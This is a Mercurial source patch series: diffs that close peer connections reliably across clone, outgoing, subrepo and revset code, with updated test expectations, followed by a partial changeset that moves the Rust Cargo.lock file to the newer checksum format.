+ createopts[b'lfs'] = True - if extensions.disabled_help(b'lfs'): - ui.status( - _( - b'(remote is using large file support (lfs), but it is ' - b'explicitly disabled in the local configuration)\n' + if extensions.disabled_help(b'lfs'): + ui.status( + _( + b'(remote is using large file support (lfs), but it is ' + b'explicitly disabled in the local configuration)\n' + ) ) - ) - else: - ui.status( - _( - b'(remote is using large file support (lfs); lfs will ' - b'be enabled for this repository)\n' + else: + ui.status( + _( + b'(remote is using large file support (lfs); lfs will ' + b'be enabled for this repository)\n' + ) ) - ) - shareopts = shareopts or {} - sharepool = shareopts.get(b'pool') - sharenamemode = shareopts.get(b'mode') - if sharepool and islocal(dest): - sharepath = None - if sharenamemode == b'identity': - # Resolve the name from the initial changeset in the remote - # repository. This returns nullid when the remote is empty. It - # raises RepoLookupError if revision 0 is filtered or otherwise - # not available. If we fail to resolve, sharing is not enabled. - try: - with srcpeer.commandexecutor() as e: - rootnode = e.callcommand( - b'lookup', - { - b'key': b'0', - }, - ).result() + shareopts = shareopts or {} + sharepool = shareopts.get(b'pool') + sharenamemode = shareopts.get(b'mode') + if sharepool and islocal(dest): + sharepath = None + if sharenamemode == b'identity': + # Resolve the name from the initial changeset in the remote + # repository. This returns nullid when the remote is empty. It + # raises RepoLookupError if revision 0 is filtered or otherwise + # not available. If we fail to resolve, sharing is not enabled. 
+ try: + with srcpeer.commandexecutor() as e: + rootnode = e.callcommand( + b'lookup', + { + b'key': b'0', + }, + ).result() - if rootnode != nullid: - sharepath = os.path.join(sharepool, hex(rootnode)) - else: + if rootnode != nullid: + sharepath = os.path.join(sharepool, hex(rootnode)) + else: + ui.status( + _( + b'(not using pooled storage: ' + b'remote appears to be empty)\n' + ) + ) + except error.RepoLookupError: ui.status( _( b'(not using pooled storage: ' - b'remote appears to be empty)\n' + b'unable to resolve identity of remote)\n' ) ) - except error.RepoLookupError: - ui.status( - _( - b'(not using pooled storage: ' - b'unable to resolve identity of remote)\n' - ) + elif sharenamemode == b'remote': + sharepath = os.path.join( + sharepool, hex(hashutil.sha1(source).digest()) + ) + else: + raise error.Abort( + _(b'unknown share naming mode: %s') % sharenamemode ) - elif sharenamemode == b'remote': - sharepath = os.path.join( - sharepool, hex(hashutil.sha1(source).digest()) - ) - else: - raise error.Abort( - _(b'unknown share naming mode: %s') % sharenamemode - ) + + # TODO this is a somewhat arbitrary restriction. + if narrow: + ui.status( + _(b'(pooled storage not supported for narrow clones)\n') + ) + sharepath = None - # TODO this is a somewhat arbitrary restriction. 
- if narrow: - ui.status(_(b'(pooled storage not supported for narrow clones)\n')) - sharepath = None + if sharepath: + return clonewithshare( + ui, + peeropts, + sharepath, + source, + srcpeer, + dest, + pull=pull, + rev=revs, + update=update, + stream=stream, + ) - if sharepath: - return clonewithshare( - ui, - peeropts, - sharepath, - source, - srcpeer, - dest, - pull=pull, - rev=revs, - update=update, - stream=stream, - ) + srcrepo = srcpeer.local() - srclock = destlock = cleandir = None - srcrepo = srcpeer.local() - try: abspath = origsource if islocal(origsource): abspath = os.path.abspath(util.urllocalpath(origsource)) @@ -1052,6 +1060,8 @@ shutil.rmtree(cleandir, True) if srcpeer is not None: srcpeer.close() + if destpeer and destpeer.local() is None: + destpeer.close() return srcpeer, destpeer @@ -1253,15 +1263,17 @@ """ source, branches = parseurl(ui.expandpath(source), opts.get(b'branch')) other = peer(repo, opts, source) - ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) - revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev')) + cleanupfn = other.close + try: + ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) + revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev')) - if revs: - revs = [other.lookup(rev) for rev in revs] - other, chlist, cleanupfn = bundlerepo.getremotechanges( - ui, repo, other, revs, opts[b"bundle"], opts[b"force"] - ) - try: + if revs: + revs = [other.lookup(rev) for rev in revs] + other, chlist, cleanupfn = bundlerepo.getremotechanges( + ui, repo, other, revs, opts[b"bundle"], opts[b"force"] + ) + if not chlist: ui.status(_(b"no changes found\n")) return subreporecurse() @@ -1320,13 +1332,17 @@ revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)] other = peer(repo, opts, dest) - outgoing = discovery.findcommonoutgoing( - repo, other, revs, force=opts.get(b'force') - ) - o = outgoing.missing - if not o: - scmutil.nochangesfound(repo.ui, repo, 
outgoing.excluded) - return o, other + try: + outgoing = discovery.findcommonoutgoing( + repo, other, revs, force=opts.get(b'force') + ) + o = outgoing.missing + if not o: + scmutil.nochangesfound(repo.ui, repo, outgoing.excluded) + return o, other + except: # re-raises + other.close() + raise def outgoing(ui, repo, dest, opts): @@ -1341,27 +1357,30 @@ limit = logcmdutil.getlimit(opts) o, other = _outgoing(ui, repo, dest, opts) - if not o: - cmdutil.outgoinghooks(ui, repo, other, opts, o) - return recurse() + try: + if not o: + cmdutil.outgoinghooks(ui, repo, other, opts, o) + return recurse() - if opts.get(b'newest_first'): - o.reverse() - ui.pager(b'outgoing') - displayer = logcmdutil.changesetdisplayer(ui, repo, opts) - count = 0 - for n in o: - if limit is not None and count >= limit: - break - parents = [p for p in repo.changelog.parents(n) if p != nullid] - if opts.get(b'no_merges') and len(parents) == 2: - continue - count += 1 - displayer.show(repo[n]) - displayer.close() - cmdutil.outgoinghooks(ui, repo, other, opts, o) - recurse() - return 0 # exit code is zero since we found outgoing changes + if opts.get(b'newest_first'): + o.reverse() + ui.pager(b'outgoing') + displayer = logcmdutil.changesetdisplayer(ui, repo, opts) + count = 0 + for n in o: + if limit is not None and count >= limit: + break + parents = [p for p in repo.changelog.parents(n) if p != nullid] + if opts.get(b'no_merges') and len(parents) == 2: + continue + count += 1 + displayer.show(repo[n]) + displayer.close() + cmdutil.outgoinghooks(ui, repo, other, opts, o) + recurse() + return 0 # exit code is zero since we found outgoing changes + finally: + other.close() def verify(repo, level=None): diff --git a/mercurial/revset.py b/mercurial/revset.py --- a/mercurial/revset.py +++ b/mercurial/revset.py @@ -1841,9 +1841,12 @@ if revs: revs = [repo.lookup(rev) for rev in revs] other = hg.peer(repo, {}, dest) - repo.ui.pushbuffer() - outgoing = discovery.findcommonoutgoing(repo, other, 
onlyheads=revs) - repo.ui.popbuffer() + try: + repo.ui.pushbuffer() + outgoing = discovery.findcommonoutgoing(repo, other, onlyheads=revs) + repo.ui.popbuffer() + finally: + other.close() cl = repo.changelog o = {cl.rev(r) for r in outgoing.missing} return subset & o diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -175,10 +175,7 @@ # to deadlocks due to a peer get gc'ed in a fork # We add our own stack trace, because the stacktrace when called # from __del__ is useless. - if False: # enabled in next commit - ui.develwarn( - b'missing close on SSH connection created at:\n%s' % warn - ) + ui.develwarn(b'missing close on SSH connection created at:\n%s' % warn) def _makeconnection(ui, sshcmd, args, remotecmd, path, sshenv=None): diff --git a/mercurial/subrepo.py b/mercurial/subrepo.py --- a/mercurial/subrepo.py +++ b/mercurial/subrepo.py @@ -716,13 +716,17 @@ _(b'sharing subrepo %s from %s\n') % (subrelpath(self), srcurl) ) - shared = hg.share( - self._repo._subparent.baseui, - getpeer(), - self._repo.root, - update=False, - bookmarks=False, - ) + peer = getpeer() + try: + shared = hg.share( + self._repo._subparent.baseui, + peer, + self._repo.root, + update=False, + bookmarks=False, + ) + finally: + peer.close() self._repo = shared.local() else: # TODO: find a common place for this and this code in the @@ -743,14 +747,18 @@ _(b'cloning subrepo %s from %s\n') % (subrelpath(self), util.hidepassword(srcurl)) ) - other, cloned = hg.clone( - self._repo._subparent.baseui, - {}, - getpeer(), - self._repo.root, - update=False, - shareopts=shareopts, - ) + peer = getpeer() + try: + other, cloned = hg.clone( + self._repo._subparent.baseui, + {}, + peer, + self._repo.root, + update=False, + shareopts=shareopts, + ) + finally: + peer.close() self._repo = cloned.local() self._initrepo(parentrepo, source, create=True) self._cachestorehash(srcurl) @@ -760,7 +768,11 @@ % (subrelpath(self), util.hidepassword(srcurl)) ) 
cleansub = self.storeclean(srcurl) - exchange.pull(self._repo, getpeer()) + peer = getpeer() + try: + exchange.pull(self._repo, peer) + finally: + peer.close() if cleansub: # keep the repo clean after pull self._cachestorehash(srcurl) @@ -845,7 +857,10 @@ % (subrelpath(self), util.hidepassword(dsturl)) ) other = hg.peer(self._repo, {b'ssh': ssh}, dsturl) - res = exchange.push(self._repo, other, force, newbranch=newbranch) + try: + res = exchange.push(self._repo, other, force, newbranch=newbranch) + finally: + other.close() # the repo is now clean self._cachestorehash(dsturl) diff --git a/tests/remotefilelog-getflogheads.py b/tests/remotefilelog-getflogheads.py --- a/tests/remotefilelog-getflogheads.py +++ b/tests/remotefilelog-getflogheads.py @@ -21,7 +21,10 @@ dest = repo.ui.expandpath(b'default') peer = hg.peer(repo, {}, dest) - flogheads = peer.x_rfl_getflogheads(path) + try: + flogheads = peer.x_rfl_getflogheads(path) + finally: + peer.close() if flogheads: for head in flogheads: diff --git a/tests/test-acl.t b/tests/test-acl.t --- a/tests/test-acl.t +++ b/tests/test-acl.t @@ -361,6 +361,7 @@ bundle2-input-bundle: 5 parts total transaction abort! rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "fred" not allowed on "foo/file.txt" (changeset "ef1ea85a6374") no rollback information available 0:6675d58eff77 @@ -808,7 +809,6 @@ acl: acl.deny.bookmarks not enabled acl: bookmark access granted: "ef1ea85a6374b77d6da9dcda9541f498f2d17df7" on bookmark "moving-bookmark" bundle2-input-bundle: 7 parts total - truncating cache/rbc-revs-v1 to 8 updating the branch cache invalid branch cache (served.hidden): tip differs added 1 changesets with 1 changes to 1 files @@ -900,6 +900,7 @@ bundle2-input-bundle: 7 parts total transaction abort! 
rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "fred" denied on bookmark "moving-bookmark" (changeset "ef1ea85a6374b77d6da9dcda9541f498f2d17df7") no rollback information available 0:6675d58eff77 @@ -985,7 +986,6 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total - truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -1073,6 +1073,7 @@ bundle2-input-bundle: 5 parts total transaction abort! rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "wilma" not allowed on "quux/file.py" (changeset "911600dab2ae") no rollback information available 0:6675d58eff77 @@ -1322,7 +1323,6 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total - truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -1499,6 +1499,7 @@ bundle2-input-bundle: 5 parts total transaction abort! rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "fred" denied on "foo/Bar/file.txt" (changeset "f9cafe1212c8") no rollback information available 0:6675d58eff77 @@ -1583,7 +1584,6 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total - truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -1671,6 +1671,7 @@ bundle2-input-bundle: 5 parts total transaction abort! 
rollback completed + truncating cache/rbc-revs-v1 to 8 abort: acl: user "fred" denied on "foo/Bar/file.txt" (changeset "f9cafe1212c8") no rollback information available 0:6675d58eff77 diff --git a/tests/test-http.t b/tests/test-http.t --- a/tests/test-http.t +++ b/tests/test-http.t @@ -382,6 +382,7 @@ devel-peer-request: 16 bytes of commands arguments in headers devel-peer-request: finished in *.???? seconds (200) (glob) received listkey for "phases": 15 bytes + (sent 9 HTTP requests and 3898 bytes; received 920 bytes in responses) $ hg rollback -q $ sed 's/.*] "/"/' < ../access.log diff --git a/tests/test-lfs-serve.t b/tests/test-lfs-serve.t --- a/tests/test-lfs-serve.t +++ b/tests/test-lfs-serve.t @@ -462,6 +462,7 @@ remote: adding manifests remote: adding file changes remote: added 1 changesets with 1 changes to 1 files + (sent 8 HTTP requests and 3526 bytes; received 961 bytes in responses) (?) $ grep 'lfs' .hg/requires $SERVER_REQUIRES .hg/requires:lfs $TESTTMP/server/.hg/requires:lfs # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614675352 -3600 # Tue Mar 02 09:55:52 2021 +0100 # Node ID 46cdd6660503fdf783a44e60186c38c41a2f384e # Parent a4c19a162615afd0dc8ab571be25d3134da7b15d rust: Upgrade Cargo.lock to the newer format As discussed in https://phab.mercurial-scm.org/D10085#153099 See https://github.com/rust-lang/cargo/pull/7070 and https://blog.rust-lang.org/2020/01/30/Rust-1.41.0.html#less-conflict-prone-cargolock-format Differential Revision: https://phab.mercurial-scm.org/D10089 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -4,1081 +4,1079 @@ name = "adler" version = "0.2.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ee2a4ec343196209d6594e19543ae87a39f96d5534d7174822a3ad825dd6ed7e" [[package]] name = "aho-corasick" version = "0.7.15" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = 
"7404febffaa47dac81aa44dba71523c9d069b1bdc50a77db41195149e17f68e5" dependencies = [ - "memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)", + "memchr", ] [[package]] name = "ansi_term" version = "0.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ee49baf6cb617b853aa8d93bf420db2383fab46d314482ca2803b40d5fde979b" dependencies = [ - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi", ] [[package]] name = "atty" version = "0.2.14" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d9b39be18770d11421cdb1b9947a45dd3f37e93092cbf377614828a319d5fee8" dependencies = [ - "hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "hermit-abi", + "libc", + "winapi", ] [[package]] name = "autocfg" version = "1.0.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cdb031dd78e28731d87d56cc8ffef4a8f36ca26c38fe2de700543e627f8a464a" [[package]] name = "bitflags" version = "1.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cf1de2fe8c75bc145a2f577add951f8134889b4795d47466a54a5c846d691693" [[package]] name = "bitmaps" version = "2.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "031043d04099746d8db04daf1fa424b2bc8bd69d92b25962dcde24da39ab64a2" dependencies = [ - "typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)", + "typenum", ] [[package]] name = "byteorder" version = "1.3.4" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "08c48aae112d48ed9f069b33538ea9e3e90aa263cfa3d1c24309612b1f7472de" [[package]] name = "bytes-cast" version = "0.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = 
"3196ba300c7bc9282a4331e878496cb3e9603a898a8f1446601317163e16ca52" dependencies = [ - "bytes-cast-derive 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)", + "bytes-cast-derive", ] [[package]] name = "bytes-cast-derive" version = "0.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cb936af9de38476664d6b58e529aff30d482e4ce1c5e150293d00730b0d81fdb" dependencies = [ - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro2", + "quote", + "syn", ] [[package]] name = "cc" version = "1.0.66" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4c0496836a84f8d0495758516b8621a622beb77c0fed418570e50764093ced48" dependencies = [ - "jobserver 0.1.21 (registry+https://github.com/rust-lang/crates.io-index)", + "jobserver", ] [[package]] name = "cfg-if" version = "0.1.10" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822" [[package]] name = "cfg-if" version = "1.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "chrono" version = "0.4.19" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "670ad68c9088c2a963aaa298cb369688cf3f9465ce5e2d4ca10e6e0098a1ce73" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "num-integer 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)", - "num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", - "time 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "num-integer", + "num-traits", + "time", + 
"winapi", ] [[package]] name = "clap" version = "2.33.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "37e58ac78573c40708d45522f0d80fa2f01cc4f9b4e2bf749807255454312002" dependencies = [ - "ansi_term 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)", - "atty 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", - "bitflags 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)", - "strsim 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)", - "textwrap 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)", - "unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)", - "vec_map 0.8.2 (registry+https://github.com/rust-lang/crates.io-index)", + "ansi_term", + "atty", + "bitflags", + "strsim", + "textwrap", + "unicode-width", + "vec_map", ] [[package]] name = "const_fn" version = "0.4.4" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cd51eab21ab4fd6a3bf889e2d0958c0a6e3a61ad04260325e919e652a2a62826" [[package]] name = "cpython" version = "0.4.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "bfaf3847ab963e40c4f6dd8d6be279bdf74007ae2413786a0dcbb28c52139a95" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", - "python27-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)", - "python3-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "num-traits", + "python27-sys", + "python3-sys", ] [[package]] name = "crc32fast" version = "1.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "81156fece84ab6a9f2afdb109ce3ae577e42b1228441eded99bd77f627953b1a" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", ] [[package]] name = "crossbeam-channel" version = "0.4.4" source = 
"registry+https://github.com/rust-lang/crates.io-index" +checksum = "b153fe7cbef478c567df0f972e02e6d736db11affe43dfc9c56a9374d1adfb87" dependencies = [ - "crossbeam-utils 0.7.2 (registry+https://github.com/rust-lang/crates.io-index)", - "maybe-uninit 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)", + "crossbeam-utils 0.7.2", + "maybe-uninit", ] [[package]] name = "crossbeam-channel" version = "0.5.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dca26ee1f8d361640700bde38b2c37d8c22b3ce2d360e1fc1c74ea4b0aa7d775" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", + "crossbeam-utils 0.8.1", ] [[package]] name = "crossbeam-deque" version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "94af6efb46fef72616855b036a624cf27ba656ffc9be1b9a3c931cfc7749a9a9" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-epoch 0.9.1 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", + "crossbeam-epoch", + "crossbeam-utils 0.8.1", ] [[package]] name = "crossbeam-epoch" version = "0.9.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a1aaa739f95311c2c7887a76863f500026092fb1dce0161dab577e559ef3569d" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "const_fn 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "memoffset 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)", - "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)", + 
"cfg-if 1.0.0", + "const_fn", + "crossbeam-utils 0.8.1", + "lazy_static", + "memoffset", + "scopeguard", ] [[package]] name = "crossbeam-utils" version = "0.7.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c3c7c73a2d1e9fc0886a08b93e98eb643461230d5f1925e4036204d5f2e261a8" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", + "cfg-if 0.1.10", + "lazy_static", ] [[package]] name = "crossbeam-utils" version = "0.8.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "02d96d1e189ef58269ebe5b97953da3274d83a93af647c2ddd6f9dab28cedb8d" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", + "cfg-if 1.0.0", + "lazy_static", ] [[package]] name = "ctor" version = "0.1.16" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7fbaabec2c953050352311293be5c6aba8e141ba19d6811862b232d6fd020484" dependencies = [ - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", + "quote", + "syn", ] [[package]] name = "derive_more" version = "0.99.11" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "41cb0e6161ad61ed084a36ba71fbba9e3ac5aee3606fb607fe08da6acbcf3d8c" dependencies = [ - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro2", + "quote", + "syn", ] [[package]] name = "difference" version = "2.0.0" 
source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "524cbf6897b527295dff137cec09ecf3a05f4fddffd7dfcd1585403449e74198" [[package]] name = "either" version = "1.6.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457" [[package]] name = "env_logger" version = "0.7.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "44533bbbb3bb3c1fa17d9f2e4e38bbbaf8396ba82193c4cb1b6445d711445d36" dependencies = [ - "atty 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", - "humantime 1.3.0 (registry+https://github.com/rust-lang/crates.io-index)", - "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", - "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)", - "termcolor 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)", + "atty", + "humantime", + "log", + "regex", + "termcolor", ] [[package]] name = "flate2" version = "1.0.19" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7411863d55df97a419aa64cb4d2f167103ea9d767e2c54a1868b7ac3f6b47129" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crc32fast 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "libz-sys 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)", - "miniz_oxide 0.4.3 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", + "crc32fast", + "libc", + "libz-sys", + "miniz_oxide", ] [[package]] name = "format-bytes" version = "0.2.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cc35f5e45d6b31053cea13078ffc6fa52fa8617aa54b7ac2011720d9c009e04f" dependencies = [ - "format-bytes-macros 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)", - "proc-macro-hack 0.5.19 
(registry+https://github.com/rust-lang/crates.io-index)", + "format-bytes-macros", + "proc-macro-hack", ] [[package]] name = "format-bytes-macros" version = "0.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b05089e341a0460449e2210c3bf7b61597860b07f0deae58da38dbed0a4c6b6d" dependencies = [ - "proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)", - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro-hack", + "proc-macro2", + "quote", + "syn", ] [[package]] name = "fuchsia-cprng" version = "0.1.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a06f77d526c1a601b7c4cdd98f54b5eaabffc14d5f2f0296febdc7f357c6d3ba" [[package]] name = "gcc" version = "0.3.55" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8f5f3913fa0bfe7ee1fd8248b6b9f42a5af4b9d65ec2dd2c3c26132b950ecfc2" [[package]] name = "getrandom" version = "0.1.15" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "fc587bc0ec293155d5bfa6b9891ec18a1e330c234f896ea47fbada4cadbe47e6" dependencies = [ - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "wasi 0.9.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 0.1.10", + "libc", + "wasi 0.9.0+wasi-snapshot-preview1", ] [[package]] name = "glob" version = "0.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9b919933a397b79c37e33b77bb2aa3dc8eb6e165ad809e58ff75bc7db2e34574" [[package]] name = "hermit-abi" version = "0.1.17" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5aca5565f760fb5b220e499d72710ed156fdb74e631659e99377d9ebfbd13ae8" dependencies 
= [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", ] [[package]] name = "hg-core" version = "0.1.0" dependencies = [ - "byteorder 1.3.4 (registry+https://github.com/rust-lang/crates.io-index)", - "bytes-cast 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)", - "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", - "derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)", - "flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)", - "format-bytes 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)", - "home 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)", - "im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", - "memmap 0.7.0 (registry+https://github.com/rust-lang/crates.io-index)", - "micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", - "pretty_assertions 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_distr 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_pcg 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rayon 1.5.0 (registry+https://github.com/rust-lang/crates.io-index)", - "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)", - "rust-crypto 0.2.36 (registry+https://github.com/rust-lang/crates.io-index)", - "same-file 1.0.6 (registry+https://github.com/rust-lang/crates.io-index)", - "tempfile 3.1.0 (registry+https://github.com/rust-lang/crates.io-index)", - "twox-hash 1.6.0 (registry+https://github.com/rust-lang/crates.io-index)", - "zstd 0.5.3+zstd.1.4.5 
